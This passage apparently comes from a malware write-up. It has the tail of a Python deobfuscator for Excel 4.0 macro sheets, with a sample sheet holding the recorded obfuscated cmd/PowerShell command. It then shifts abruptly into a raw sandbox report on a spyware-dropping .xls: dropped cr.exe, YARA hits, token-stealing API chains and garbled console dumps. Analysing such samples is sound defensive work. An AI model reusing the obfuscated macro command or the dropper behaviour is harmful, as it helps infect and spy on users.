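            lit = LITERAL_CELL_RE.match(target) if target else None
            return '"' + lit.group(1) + '"' if lit else m.group(0)
        return REF_RE.sub(repl, formula)
    return {ref: inline(f) for ref, f in cells.items()}


def analyse_sheet(cells):
    """cells maps an A1-style reference to its formula text."""
    decoded = {ref: deobfuscate(f) for ref, f in cells.items()}
    resolved = resolve_refs(decoded)
    findings = [(ref, fn, f) for ref, f in resolved.items()
                for fn in SUSPICIOUS_FUNCS if re.search(r"\b" + fn + r"\(", f, re.IGNORECASE)]
    char_calls = sum(len(CHAR_RE.findall(f)) for f in cells.values())
    return {"char_calls": char_calls, "resolved": resolved, "findings": findings}


# Constructed sheet (the report does not reproduce the macro cells). The command
# string is the one the sandbox recorded for cmd.exe; only the split into
# CHAR() calls and literals is invented.
SAMPLE_CELLS = {
    "A1": '=CHAR(99)&CHAR(109)&CHAR(100)&" /c powershe^l^l -w 1 stARt`-slE`Ep 3; "'
          '&"Move-Item \'pd.bat\' -Destination \'$e`nV:T`EMP\'"',
    "A2": "=EXEC(A1)",
    "A3": "=HALT()",
}

if __name__ == "__main__":
    result = analyse_sheet(SAMPLE_CELLS)
    print("CHAR() calls:", result["char_calls"])
    for ref, fn, formula in result["findings"]:
        print(f"{ref}: {fn} -> {formula}")
```

The merge loop is what makes the CHAR() count useful: 21 calls on the real sample only matter because the pieces are joined with & into one string, and the EXEC finding only names a command after the A1 reference has been inlined. Real sheets also use FORMULA() to write cells at run time and defined names such as Auto_Open; both are outside this example.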
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cr.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00412EFA 24_2_00412EFA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00413396 24_2_00413396
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00425760 24_2_00425760
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040B831 24_2_0040B831
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409D52 24_2_00409D52
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0046415B 24_2_0046415B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044217B 24_2_0044217B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004141D0 24_2_004141D0
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004181FE 24_2_004181FE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00436208 24_2_00436208
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041C2ED 24_2_0041C2ED
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004242AB 24_2_004242AB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00442436 24_2_00442436
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040C498 24_2_0040C498
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043C4AE 24_2_0043C4AE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004365E1 24_2_004365E1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041A6B3 24_2_0041A6B3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040A753 24_2_0040A753
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00442840 24_2_00442840
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045CA0D 24_2_0045CA0D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044CCD8 24_2_0044CCD8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00416D15 24_2_00416D15
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044CF0A 24_2_0044CF0A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043D000 24_2_0043D000
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004310FD 24_2_004310FD
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004350A7 24_2_004350A7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044D16F 24_2_0044D16F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041930E 24_2_0041930E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004275AA 24_2_004275AA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040964F 24_2_0040964F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00417625 24_2_00417625
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 24_2_00423778
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00461842 24_2_00461842
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041186E 24_2_0041186E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441898 24_2_00441898
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045D929 24_2_0045D929
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00413A83 24_2_00413A83
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441C0A 24_2_00441C0A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00419CEB 24_2_00419CEB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00417E68 24_2_00417E68
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00449EC0 24_2_00449EC0
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00447EFA 24_2_00447EFA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441EB4 24_2_00441EB4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459EB9 24_2_00459EB9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459FD9 24_2_00459FD9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002880B8 24_2_002880B8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CA109 24_2_002CA109
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BA110 24_2_002BA110
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B814A 24_2_002B814A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028314A 24_2_0028314A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BD15A 24_2_002BD15A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CA229 24_2_002CA229
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AD250 24_2_002AD250
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BD3BF 24_2_002BD3BF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00284420 24_2_00284420
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002944FB 24_2_002944FB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028C53D 24_2_0028C53D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002835E6 24_2_002835E6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027C6E8 24_2_0027C6E8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AC6FE 24_2_002AC6FE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00287875 24_2_00287875
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027989F 24_2_0027989F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028A903 24_2_0028A903
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027A9A3 24_2_0027A9A3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002939C8 24_2_002939C8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00281ABE 24_2_00281ABE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027BA81 24_2_0027BA81
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B2A90 24_2_002B2A90
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D1A92 24_2_002D1A92
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B1AE8 24_2_002B1AE8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CCC5D 24_2_002CCC5D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00283CD3 24_2_00283CD3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BCF28 24_2_002BCF28
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00289F3B 24_2_00289F3B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 24_2_00279FA2
Document contains embedded VBA macros
Source: ul9kpUwYel.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002D76B0 appears 153 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002BED89 appears 75 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0027F4FF appears 176 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFA10 appears 81 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0040F2AF appears 181 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043F7C0 appears 82 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFE70 appears 51 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 00467460 appears 172 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0044EB39 appears 77 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043FC20 appears 61 times
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
PE file contains strange resources
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: ul9kpUwYel.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW, 24_2_00437BD1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043433D CoCreateInstance, 24_2_0043433D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\251F0000
Source: C:\Users\user\AppData\Roaming\cr.exe Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp
Source: ul9kpUwYel.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................#.................F...............F.......A.....`IC........v.....................KJ.......).....l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................p.j....X|................T.............}..v.....|......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v............0...............h.`.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../................p.j......................T.............}..v.... .......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v....0....... ...............h.`....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;................p.j......................T.............}..v....h.......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....G...............{..j......`...............T.............}..v............0.................)............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G................p.j......................T.............}..v....0.......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....S...............{..j......`...............T.............}..v....X.......0.................).....^....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S................p.j......................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v...._...............{..j......`...............T.............}..v............0.................).....Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._................p.j....h.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....k...............{..j......`...............T.............}..v............0.................)............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k................p.j....h.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v............0...............h.`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w................p.j....@.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......{..j......`...............T.............}..v....P.......0...............h.`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................p.j......................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............[S.j.....r................T.............}..v.....s......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....(w......0...............H.i.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............[S.j.....w................T.............}..v....`x......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v....p|......0...............H.i....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............[S.j....(}................T.............}..v.....}......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............;P.j......i...............T.............}..v............0.......................`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............[S.j......................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............;P.j......i...............T.............}..v....0.......0.......................^....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............[S.j......................T.............}..v....h.......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............;P.j......i...............T.............}..v............0.......................`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............[S.j....H.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............;P.j......i...............T.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............[S.j....H.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............H.i....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w...............[S.j......................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......;P.j......i...............T.............}..v............0...............H.i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................[S.j....X.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................@{ .....................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................m.o.d.e........./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .1.8.,.1. ..............................\Q.....m.o.d.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....m.o.d.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................@{ .....................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................c.o.l.o.r......./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .F.E. ..................................\Q.....c.o.l.o..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....c.o.l.o..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ........................................................................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t.l.o.c.a.l./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....s.e.t.l..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................................................J....................i^Q.....`{.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................f.o.r...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.F...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .%.i. .i.n. ...=.4.-.5..................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(.'.v.e.r.'.). .d.o. .5..................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t...........d.o. .5..................\Q.....X%.J.............D$.............................x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.%.i...%.j. ............\Q.....s.e.t............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................p.%......................QQ..............i$.....................H................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t............\%.......................$...............%........J....x.......X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.6...1. ................^Q.....s.e.t....i$.....................(................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................=.6...1..................^Q.....s.e.t....i$.....................(................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J....................i^Q......$.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".1.0...0.". ..........\Q.....i.f. ............D$.............X....... ....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$..................... .......x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................e.c.h.o.........}..v....................|....................................................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D$.....................0....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................|....................................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.............D........................................................]Q.....r.e.g............D$...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>......................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................y\Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............t.i.m.e.o.u.t...}..v....................|...............3.......................8............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D............... ./.t. .2. . ............................]Q.....t.i.m.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>.....................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............n.u.l. .................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D............... ..... .........d1.......................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............s.c.h.t.a.s.k.s.}..v....................|.......D.......^....................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.............D.......................................................i]Q.....s.c.h.t..........D$...............$.....v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>......................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............n.u.l. ..................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................9]Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ......................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...3.". ............\Q.....i.f. ............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$.............................x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................e.c.h.o.........}..v....................|....................................................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D$.....................2....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................|....................................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................]Q.....r.e.g............D$...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................y\Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|...............@.......................8............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.c.h.t.a.s.k.s.}..v....................|...............f....................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................9]Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x............... Jump to behavior
